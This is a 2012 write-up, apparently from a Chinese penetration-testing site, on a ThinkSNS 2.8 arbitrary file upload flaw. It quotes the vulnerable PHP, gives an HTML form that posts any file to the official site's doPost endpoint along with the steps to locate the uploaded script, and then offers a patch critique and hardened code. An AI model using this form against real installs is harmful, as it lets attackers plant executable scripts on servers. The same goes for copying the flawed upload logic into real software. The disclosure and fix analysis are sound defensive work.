中国网络渗透测试联盟
Title: ThinkSNS 2.8 arbitrary file upload vulnerability and fix
Author: admin
Time: 2012-12-4 11:12
When an image is attached to a microblog post, the upload is validated only on the client side; the server performs no security filtering at all.

Vulnerable code, in \api\StatusesApi.class.php:
    function uploadpic(){
        $result = array();
        if( $_FILES['pic'] ){
            //执行上传操作 (perform the upload)
            $savePath = $this->_getSaveTempPath();
            // The stored name is md5(time().'teste') followed by everything after the
            // FIRST dot of the client-supplied name: the extension is fully attacker-controlled.
            $filename = md5( time().'teste' ).'.'.substr($_FILES['pic']['name'],strpos($_FILES['pic']['name'],'.')+1);
            // copy() is tried before move_uploaded_file(), so the file is written even when
            // tmp_name is not a genuine upload.
            if(@copy($_FILES['pic']['tmp_name'], $savePath.'/'.$filename) || @move_uploaded_file($_FILES['pic']['tmp_name'], $savePath.'/'.$filename))
            {
                $result['boolen'] = 1;
                $result['type_data'] = 'temp/'.$filename;
                $result['picurl'] = SITE_PATH.'/uploads/temp/'.$filename;
            } else {
                $result['boolen'] = 0;
                $result['message'] = '上传失败';   // upload failed
            }
        }else{
            $result['boolen'] = 0;
            $result['message'] = '上传失败';   // upload failed
        }
        return $result;
    }
The uploadpic() method never checks the file type. The stored name is built from the part of the client-supplied name after the first dot, so uploading a file named x.php results in <md5>.php being written under uploads/temp/.

You can therefore build your own form, pick any file, and submit it to

/index.php?app=w3g&mod=Index&act=doPost

The address of the uploaded file appears on the newly created microblog post as a thumbnail URL; strip the small_ or middle_ prefix to reach the original file.
After logging in to the official ThinkSNS microblog, build the following form (the original post's <form> tag was written as a self-closing tag; it is corrected here so the inputs are actually inside the form):

    <form action="http://t.thinksns.com/index.php?app=w3g&mod=Index&act=doPost" method="post" enctype="multipart/form-data">
        <textarea name="content">test</textarea>
        file: <input id="file" type="file" name="pic" />
        <input type="submit" value="Post" />
    </form>

Then take the image URL from the new post and remove the thumbnail prefix (small_) to get the uploaded file itself.
Fix:

\api\StatusesApi.class.php
    function uploadpic(){
        /**
         * 20121018 @yelo
         * 增加上传类型验证 (added upload-type validation)
         */
        $result = array();
        // pathinfo() takes the part after the LAST dot; a name without a dot has no 'extension' key.
        $pathinfo = isset($_FILES['pic']['name']) ? pathinfo($_FILES['pic']['name']) : array();
        $ext = isset($pathinfo['extension']) ? $pathinfo['extension'] : '';
        $allowExts = array('jpg', 'png', 'gif', 'jpeg');

        $uploadCondition = !empty($_FILES['pic']) && in_array(strtolower($ext),$allowExts,true);

        if( $uploadCondition ){
            //执行上传操作 (perform the upload)
            $savePath = $this->_getSaveTempPath();
            // Unchanged from the vulnerable version: the stored name still takes everything
            // after the FIRST dot of the client-supplied name, not the validated $ext.
            $filename = md5( time().'teste' ).'.'.substr($_FILES['pic']['name'],strpos($_FILES['pic']['name'],'.')+1);
            if(@copy($_FILES['pic']['tmp_name'], $savePath.'/'.$filename) || @move_uploaded_file($_FILES['pic']['tmp_name'], $savePath.'/'.$filename))
            {
                $result['boolen'] = 1;
                $result['type_data'] = 'temp/'.$filename;
                $result['picurl'] = SITE_PATH.'/uploads/temp/'.$filename;
            } else {
                $result['boolen'] = 0;
                $result['message'] = '上传失败';   // upload failed
            }
        }else{
            $result['boolen'] = 0;
            $result['message'] = '上传失败';   // upload failed
        }
        return $result;
    }

Two things to note about this patch. It validates the extension after the last dot (pathinfo) but still builds the stored name from everything after the first dot, so a file named x.php.jpg passes the check and is stored as <md5>.php.jpg; whether such a name is ever executed depends on the web server's handler configuration. And it looks only at the name, never at the contents, so any data at all is accepted as long as the name ends in jpg, jpeg, png or gif.
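As an added example (written for this page, not ThinkSNS code), here is a stricter replacement for the check above. It derives the stored extension from the file contents with getimagesize() rather than from the client-supplied name, lets no part of $_FILES['pic']['name'] reach the filesystem, and drops the copy() fallback. The function and helper names are made up for the example; it assumes $savePath is a writable directory that the web server serves as static files only, and that $sitePath is the URL prefix the original code reads from SITE_PATH.

```php
<?php
// Added example, not ThinkSNS code. Assumptions: $savePath is writable and has no
// script handler configured on the web server; $sitePath is the site URL prefix.

// Map the image type found in the file header to the extension we will store.
// Returns null for anything that does not parse as GIF, JPEG or PNG.
function pictureExtensionFromContent($tmpPath) {
    static $extByType = array(
        IMAGETYPE_GIF  => 'gif',
        IMAGETYPE_JPEG => 'jpg',
        IMAGETYPE_PNG  => 'png',
    );
    $info = @getimagesize($tmpPath);   // false unless the header parses as an image
    if ($info === false || !isset($extByType[$info[2]])) {
        return null;
    }
    return $extByType[$info[2]];
}

// Server-generated name: random hex plus the content-derived extension.
// Nothing from the client's filename is used.
function makeStoredName($ext) {
    $raw = function_exists('random_bytes') ? random_bytes(16) : openssl_random_pseudo_bytes(16);
    return bin2hex($raw) . '.' . $ext;
}

function uploadpicHardened(array $file, $savePath, $sitePath) {
    $result = array('boolen' => 0, 'message' => '上传失败');

    // Accept only a file that PHP itself received in this request's multipart body.
    if (!isset($file['tmp_name'], $file['error']) || $file['error'] !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return $result;
    }

    $ext = pictureExtensionFromContent($file['tmp_name']);
    if ($ext === null) {
        $result['message'] = '只允许上传 JPG/PNG/GIF 图片';   // only JPG/PNG/GIF allowed
        return $result;
    }

    $filename = makeStoredName($ext);
    $target = rtrim($savePath, '/') . '/' . $filename;

    // move_uploaded_file() refuses anything that is not an uploaded file; no copy() fallback.
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return $result;
    }

    $result['boolen'] = 1;
    $result['type_data'] = 'temp/' . $filename;
    $result['picurl'] = $sitePath . '/uploads/temp/' . $filename;
    return $result;
}

// Offline self-check on constructed inputs (no HTTP request needed): a 1x1 GIF
// must be classified as 'gif'; a PHP script saved under an image-looking name
// must be rejected (null) because its header is not an image header.
$dir = sys_get_temp_dir();
$gif = $dir . '/probe.gif';
file_put_contents($gif, base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'));
$php = $dir . '/probe.php.jpg';
file_put_contents($php, "<?php echo 'owned'; ?>");
var_dump(pictureExtensionFromContent($gif));
var_dump(pictureExtensionFromContent($php));
unlink($gif);
unlink($php);
```

The content check on its own is not a sufficient defence: getimagesize() happily accepts a valid GIF with PHP code appended after the image data. What actually stops that file from running is that the stored name gets a server-chosen image extension and the upload directory is served without any script handler, which is why both of those are the non-negotiable parts of the example.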
Source: 中国网络渗透测试联盟 (https://www.cobjon.com/)